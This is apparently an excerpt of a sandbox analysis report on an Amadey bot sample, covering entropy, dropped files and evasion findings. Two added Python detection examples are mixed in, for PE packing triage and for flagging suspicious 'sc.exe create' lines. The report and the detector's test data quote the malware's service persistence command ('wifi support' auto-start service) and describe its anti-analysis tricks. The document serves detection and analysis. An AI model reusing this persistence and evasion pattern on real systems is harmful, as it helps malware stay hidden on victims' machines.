                          Source: B3BA.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x9011f
                          Source: initial sampleStatic PE information: section name: .didata entropy: 7.99713235918
                          Source: initial sampleStatic PE information: section name: .text entropy: 7.2566886804
                          Source: initial sampleStatic PE information: section name: entropy: 7.9969707961
                          Source: initial sampleStatic PE information: section name: entropy: 7.91194455639
                          Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22501727341
                          Source: initial sampleStatic PE information: section name: .T3QbYgM entropy: 7.91938761659
                          Source: B3BA.exe.5.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: B3BA.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 20.0.B3BA.exe.370000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 20.0.B3BA.exe.370000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 20.0.B3BA.exe.370000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 20.0.B3BA.exe.370000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 20.0.B3BA.exe.370000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 20.0.B3BA.exe.370000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 20.2.B3BA.exe.370000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 20.2.B3BA.exe.370000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 20.0.B3BA.exe.370000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 20.0.B3BA.exe.370000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 41.2.B3BA.exe.250000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 41.2.B3BA.exe.250000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 41.0.B3BA.exe.250000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 41.0.B3BA.exe.250000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 41.0.B3BA.exe.250000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 41.0.B3BA.exe.250000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 41.0.B3BA.exe.250000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 41.0.B3BA.exe.250000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 41.0.B3BA.exe.250000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 41.0.B3BA.exe.250000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
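The Data Obfuscation findings above (empty and non-standard section names such as .T3QbYgM, sections with entropy close to 8, a stored PE checksum of 0x0 that "should be" another value, a compile timestamp in 2061, an entry point outside .text, and the ".text:ER;.rdata:R;..." section-rights string compared between the on-disk file and the unpacked image) can all be reproduced with a small static header walk. The following is an added example written for this page, not code from the sandbox report or from any of the analysed samples. It uses only the Python standard library; build_pe() constructs its own test image (the section name .T3QbYgM and the timestamp 0xAB35ADD6 are copied from the findings above, everything else about the image is made up), and the 7.0 entropy threshold is an assumption, not the sandbox's own cut-off.

```python
"""Static PE triage for the packing indicators listed above: non-standard or
empty section names, high section entropy, a stored checksum that does not match
the computed one, a compile timestamp in the future, an entry point outside
.text, and the report's 'name:rights;' section summary. Added example, not part
of the sandbox report; build_pe() constructs the input image."""
import math
import struct
import time
from collections import Counter

SCN_EXECUTE, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                     ".edata", ".pdata", ".bss", ".tls", ".CRT", ".didat"}

def entropy(buf):
    """Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    n = len(buf)
    return 0.0 - sum(c / n * math.log2(c / n) for c in Counter(buf).values()) if n else 0.0

def pe_checksum(data, checksum_offset):
    """PE image checksum (the algorithm pefile.generate_checksum implements)."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for i in range(len(padded) // 4):
        if i == checksum_offset // 4:          # the CheckSum field itself is skipped
            continue
        total += struct.unpack_from("<I", padded, i * 4)[0]
        if total >= 1 << 32:                   # end-around carry
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)   # fold to 16 bits
    total += total >> 16
    return (total & 0xFFFF) + len(data)

def parse_pe(data):
    """Minimal header walk (PE32 and PE32+ share the offsets used here)."""
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    assert data[:2] == b"MZ" and data[pe_off:pe_off + 4] == b"PE\0\0", "not a PE file"
    _, nsect, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe_off + 4)
    opt_off = pe_off + 24
    sections = []
    for i in range(nsect):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt_off + opt_size + i * 40)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va,
                         "vsize": vsize, "characteristics": chars,
                         "entropy": entropy(data[rawptr:rawptr + rawsize])})
    return {"timestamp": timestamp, "sections": sections,
            "entry_rva": struct.unpack_from("<I", data, opt_off + 16)[0],
            "checksum_stored": struct.unpack_from("<I", data, opt_off + 0x40)[0],
            "checksum_offset": opt_off + 0x40}

def section_rights(sections):
    """Report-style summary such as '.text:ER;.rdata:R;.data:W;' built from Characteristics."""
    flags = (("E", SCN_EXECUTE), ("R", SCN_READ), ("W", SCN_WRITE))
    return "".join("%s:%s;" % (s["name"], "".join(f for f, b in flags if s["characteristics"] & b))
                   for s in sections)

def triage(data, now=None):
    """Return the packing indicators found in a PE buffer, phrased like the report lines."""
    now = time.time() if now is None else now
    pe = parse_pe(data)
    findings = []
    if pe["timestamp"] > now:
        findings.append("compile timestamp in the future: 0x%08X" % pe["timestamp"])
    computed = pe_checksum(data, pe["checksum_offset"])
    if pe["checksum_stored"] != computed:
        findings.append("real checksum: 0x%x should be: 0x%x" % (pe["checksum_stored"], computed))
    for s in pe["sections"]:
        if s["name"] not in STANDARD_SECTIONS:
            findings.append("section name: %s" % s["name"])
        if s["entropy"] > 7.0:                 # assumed threshold for 'packed-looking'
            findings.append("section %s entropy: %.2f" % (s["name"], s["entropy"]))
        if s["va"] <= pe["entry_rva"] < s["va"] + s["vsize"] and s["name"] != ".text":
            findings.append("entry point in section %s" % s["name"])
    return findings

def build_pe(sections, timestamp=0, checksum=0, entry_rva=0x1000):
    """Construct a minimal PE32 file (not a real binary) from (name, bytes, characteristics)
    triples; section i is mapped at RVA 0x1000*(i+1), raw data follows the 0x200-byte headers."""
    align, n = 0x200, len(sections)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                      # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, n, timestamp, 0, 0, 0xE0, 0x102)  # i386, PE32 opt hdr
    opt = (struct.pack("<HBBIIIIIIIII", 0x10B, 14, 0, 0, 0, 0, entry_rva, 0x1000, 0x2000,
                       0x400000, 0x1000, align)
           + struct.pack("<HHHHHHIIII", 6, 0, 0, 0, 6, 0, 0, 0x1000 * (n + 1), align, checksum)
           + struct.pack("<HHIIIIII", 2, 0, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
           + b"\0" * 128)                                                    # 16 empty directories
    hdrs, body = b"", b""
    for i, (name, raw, chars) in enumerate(sections):
        raw = raw.ljust(-(-len(raw) // align) * align, b"\0")
        hdrs += struct.pack("<8sIIIIIIHHI", name.encode(), len(raw), 0x1000 * (i + 1),
                            len(raw), align + len(body), 0, 0, 0, 0, chars)
        body += raw
    return (dos + b"PE\0\0" + coff + opt + hdrs).ljust(align, b"\0") + body

PACKED = bytes(range(256)) * 4       # constructed: every byte value equally often -> entropy 8.0
PLAIN = b"\x55\x8b\xec\xc3" * 256    # constructed: four byte values, equal counts -> entropy 2.0

def demo():
    """Triage a constructed image that mimics the packed droppers listed in the report."""
    sample = build_pe([(".text", PLAIN, SCN_EXECUTE | SCN_READ),
                       (".T3QbYgM", PACKED, SCN_READ | SCN_WRITE),
                       ("", PACKED, SCN_READ)], timestamp=0xAB35ADD6, entry_rva=0x2000)
    return triage(sample, now=1640000000)
```

demo() yields the same kind of lines as the report: the future timestamp, "real checksum: 0x0 should be: 0x...", the non-standard and the empty section name, two sections with entropy 8.00, and an entry point in .T3QbYgM. The "changes PE section rights" finding is a comparison of section_rights() between the dropped file and a dump of the unpacked process image; running the function on both buffers and comparing the strings reproduces the ".rsrc vs .reloc" difference reported for 7063.exe and A8FB.exe.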

                          Persistence and Installation Behavior:

                          Yara detected Amadey bot
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Drops executables to the windows directory (C:\Windows) and starts them
                          Source: unknownExecutable created and started: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ujhcrda
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B3BA.exe
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeFile created: C:\Users\user\AppData\Local\Temp\szdcdkt.exe
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8B25.exe
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8008.exe
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\1BCC.exe
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\7063.exe
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9874.exe
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A8FB.exe
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\382E.exe
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\5126.exe
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe (copy)
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\60C2.exe
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ujhcrda
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6674.exe
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe (copy)
                          Source: C:\Windows\SysWOW64\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\uuqefjyt
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" create uuqefjyt binPath= "C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d\"C:\Users\user\AppData\Local\Temp\A8FB.exe\"" type= own start= auto DisplayName= "wifi support"
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeCode function: 19_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
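The persistence shown above is a service registration: A8FB.exe runs sc.exe create with an eight-letter random name (uuqefjyt), a binary copied into a SysWOW64 subfolder of the same name, a /d argument that points back at the dropper in %TEMP%, auto start, and the display name "wifi support", after which HKLM\SYSTEM\ControlSet001\Services\uuqefjyt is written. The following is an added example for this page, not code from the report: it parses sc.exe create command lines as they appear in process-creation telemetry (Sysmon event 1, Security event 4688) and lists the reasons a line matches that pattern. The command lines in SAMPLE_CMDLINES are constructed (the first reproduces the report's invocation with its quoting), and both the list of generic display names and the "four consonants in a row" name heuristic are assumptions to tune per environment.

```python
"""Flag 'sc.exe create' command lines that match the service persistence shown
above: a random-looking service name, a binary dropped into a same-named
subfolder of System32/SysWOW64, a start argument pointing back at a file in a
user-writable directory, and a generic display name. Added example, not part
of the report; the command lines in SAMPLE_CMDLINES are constructed."""
import re

SC_ARG = re.compile(r'(\w+)=\s*("(?:[^"\\]|\\.)*"|\S+)')   # sc.exe's 'key= value' syntax
SC_CREATE = re.compile(r'\bsc(?:\.exe)?"?\s+create\s+("[^"]+"|\S+)', re.IGNORECASE)
SYSDIR_SUBFOLDER = re.compile(r'[a-z]:\\windows\\(?:system32|syswow64)\\([^\\"]+)\\[^\\"]+\.exe')
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\",
                 "\\users\\public\\", "\\programdata\\")
GENERIC_DISPLAY_NAMES = {"wifi support", "windows update", "system service"}  # assumption, extend

def unquote(value):
    """Strip one pair of surrounding quotes and unescape \\" inside them."""
    if len(value) >= 2 and value[0] == value[-1] == '"':
        value = value[1:-1]
    return value.replace('\\"', '"')

def parse_sc_create(cmdline):
    """Return the service name plus the 'key= value' arguments of an 'sc create'
    command line (keys lower-cased), or None when the line is not one."""
    m = SC_CREATE.search(cmdline)
    if not m:
        return None
    args = {k.lower(): unquote(v) for k, v in SC_ARG.findall(cmdline[m.end():])}
    args["service"] = unquote(m.group(1))
    return args

def assess(cmdline):
    """List the reasons an 'sc create' line looks like malware persistence; [] if none."""
    args = parse_sc_create(cmdline)
    if args is None:
        return []
    service, binpath = args["service"], args.get("binpath", "")
    low = binpath.lower()
    reasons = []
    m = SYSDIR_SUBFOLDER.search(low)
    if m and m.group(1) == service.lower():
        reasons.append("binary installed in a system-directory subfolder named after the service")
    if any(d in low for d in USER_WRITABLE):
        reasons.append("binPath references a user-writable location: %s" % binpath)
    if re.search(r"[bcdfghjklmnpqrstvwxyz]{4}", service.lower()):   # heuristic for random names
        reasons.append("service name %r looks machine-generated" % service)
    if args.get("displayname", "").lower() in GENERIC_DISPLAY_NAMES:
        reasons.append("generic display name %r" % args["displayname"])
    return reasons

SAMPLE_CMDLINES = [
    # constructed from the sc.exe invocation listed in this report
    r'"C:\Windows\System32\sc.exe" create uuqefjyt binPath= "C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe'
    r' /d\"C:\Users\user\AppData\Local\Temp\A8FB.exe\"" type= own start= auto DisplayName= "wifi support"',
    # constructed benign service installation for comparison
    r'sc.exe create AcmeBackup binPath= "C:\Program Files\Acme\agent.exe" start= auto DisplayName= "Acme Backup"',
    r'sc.exe query wuauserv',
]

def scan(cmdlines=SAMPLE_CMDLINES):
    """Map each flagged command line to its reasons; unflagged lines are omitted."""
    results = {c: assess(c) for c in cmdlines}
    return {c: r for c, r in results.items() if r}
```

Only the first constructed line is flagged, on all four counts; the benign installation and the sc.exe query line produce nothing. The same parser applies to the registry side of the finding: the ImagePath value under HKLM\SYSTEM\CurrentControlSet\Services\<name> holds the binPath string, so assess() can be run over exported service ImagePath values as well as over command lines.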

                          Hooking and other Techniques for Hiding and Protection:

                          Deletes itself after installation
                          Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\0cjy7lkv1a.exe
                          Hides that the sample has been downloaded from the Internet (zone.identifier)
                          Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\ujhcrda:Zone.Identifier read attributes | delete
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_0040C2E0 CreateDCompositionHwndTarget,CreateDCompositionHwndTarget,GetProcAddress,GetProcAddress,GetProcAddress,ClipCursor,ClipCursor,GetProcAddress,DwmKernelStartup,DwmKernelStartup,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DwmGetRemoteSessionOcclusionEvent,DwmGetRemoteSessionOcclusionEvent,LoadLibraryA,DelegateInput,DelegateInput,LoadLibraryA,EnableNonClientDpiScaling,EnableNonClientDpiScaling,GetProcAddress,GetProcAddress,
                          Source: C:\Windows\SysWOW64\WerFault.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                          Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Process information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Process information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe | Process information set: NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exe | Process information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exe | Process information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion:

                          Found evasive API chain (may stop execution after checking mutex)
                          Source: C:\Users\user\AppData\Local\Temp\7063.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep
                          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                          Source: ujhcrda, 0000000D.00000002.471468545.000000000048B000.00000004.00000020.sdmp | Binary or memory string: ASWHOOK
                          Found evasive API chain (may stop execution after checking locale)
                          Source: C:\Users\user\AppData\Local\Temp\7063.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess
                          Checks if the current machine is a virtual machine (disk enumeration)
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\ujhcrda | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                          Source: C:\Users\user\AppData\Local\Temp\7063.exe | Evasive API call chain: GetPEB, DecisionNodes, Sleep
                          Source: C:\Users\user\AppData\Local\Temp\7063.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
                          Contains functionality to detect sleep reduction / modifications
                          Source: C:\Users\user\AppData\Local\Temp\7063.exe | Code function: 17_2_00406AA0
                          Found evasive API chain (may stop execution after checking computer name)
                          Source: C:\Users\user\AppData\Local\Temp\7063.exe | Evasive API call chain: GetComputerName,DecisionNodes,Sleep
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                          Source: C:\Windows\SysWOW64\svchost.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exe TID: 4676 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 5052 | Thread sleep time: -180000s >= -30000s
                          Source: C:\Windows\SysWOW64\svchost.exe TID: 2944 | Thread sleep count: 38 > 30
                          Source: C:\Windows\SysWOW64\svchost.exe TID: 2944 | Thread sleep time: -38000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 5428 | Thread sleep time: -30000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                          Source: C:\Windows\SysWOW64\svchost.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exe | Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 604
                          Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 435
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exe | API coverage: 8.1 %
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe | API coverage: 6.6 %
                          Source: C:\Users\user\AppData\Local\Temp\7063.exe | Code function: 17_2_00406AA0
                          Source: C:\Windows\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8B25.exe
                          Source: C:\Windows\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9874.exe
                          Source: C:\Windows\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6674.exe
                          Source: C:\Users\user\AppData\Local\Temp\7063.exe | Evaded block: after key decision
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | Evaded block: after key decision
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe | Evaded block: after key decision
                          Source: C:\Windows\SysWOW64\svchost.exe | Evaded block: after key decision
                          Source: C:\Windows\SysWOW64\svchost.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
                          Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
                          Source: C:\Windows\SysWOW64\svchost.exe | Code function: inet_addr,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetBestInterface,GetProcessHeap,HeapAlloc,GetAdaptersInfo,HeapReAlloc,GetAdaptersInfo,HeapFree,FreeLibrary,FreeLibrary,
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exe | Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\7063.exe | API call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exe | API call chain: ExitProcess graph end node
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe | API call chain: ExitProcess graph end node
